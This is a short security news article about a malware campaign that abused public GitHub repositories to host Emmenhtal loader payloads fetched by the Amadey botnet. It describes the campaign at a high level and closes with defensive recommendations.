GitHub Abused in Malware-as-a-Service Attack Campaign
▼ Summary
– A new malware campaign uses public GitHub repositories to distribute malicious payloads via the Amadey botnet and Emmenhtal loaders, delivering malware like SmokeLoader and AsyncRAT.
– The Emmenhtal loader, initially seen in phishing emails targeting Ukrainian organizations, was later found in GitHub repositories, bypassing email-based distribution.
– GitHub was exploited as an open directory to host malware payloads, making detection harder due to the platform’s common enterprise accessibility.
– Three GitHub accounts (Legendary99999, DFfe9ewf, Milidmdds) were linked to the campaign, hosting repositories with malware, toolkits, and custom scripts.
– Despite different distribution methods, the GitHub-hosted Emmenhtal scripts mirrored those in the phishing campaign, featuring a four-layer obfuscation architecture.
Security researchers have flagged a sophisticated malware campaign that hijacks GitHub repositories to push dangerous payloads under a malware-as-a-service scheme. Tied to the Amadey botnet and Emmenhtal loaders, the operation funnels multiple threats, SmokeLoader, Lumma, and AsyncRAT, into compromised systems.
The campaign first surfaced in phishing emails aimed at Ukrainian targets, but the Emmenhtal loader has now turned up in public GitHub repositories, showing a clear shift in how attackers deliver malicious code. Instead of relying solely on email lures, they exploit GitHub’s trusted status to dodge detection and land malware directly inside corporate environments.
GitHub’s widespread use makes it a tempting tool for attackers looking to blend in. By planting payloads in open repositories, threat actors ride on the platform’s reputation to slip through security defenses. Researchers tracked down three main GitHub accounts fueling the operation:
Legendary99999, home to over 160 malware-packed repositories
The structure was simple but effective. Files were set up for direct download via GitHub URLs. Once the Amadey botnet infected a machine, it reached back to GitHub to grab and run these payloads.
Technical ties connect these GitHub-hosted scripts to earlier phishing efforts. Both use a four-layer obfuscation process to cloak their activities:
- JavaScript-based PowerShell launchers
- AES-encrypted payloads
- Final PowerShell scripts aimed at specific IPs
Attackers even slipped in decoys like fake MP4 files and a Python script called “checkbalance.py”, posing as a crypto balance checker but actually launching malicious PowerShell commands behind the scenes.
Security experts recommend tightening defenses now. Companies should:
- Block script-based attachments
- Watch for unusual PowerShell activity
- Reassess GitHub access policies
- Use behavioral analytics to catch suspicious downloads
GitHub has since removed the flagged accounts, but the incident underlines how legitimate platforms can be twisted into attack channels. Staying ahead of these tactics demands proactive monitoring and smarter safeguards.
(Source: InfoSecurity)
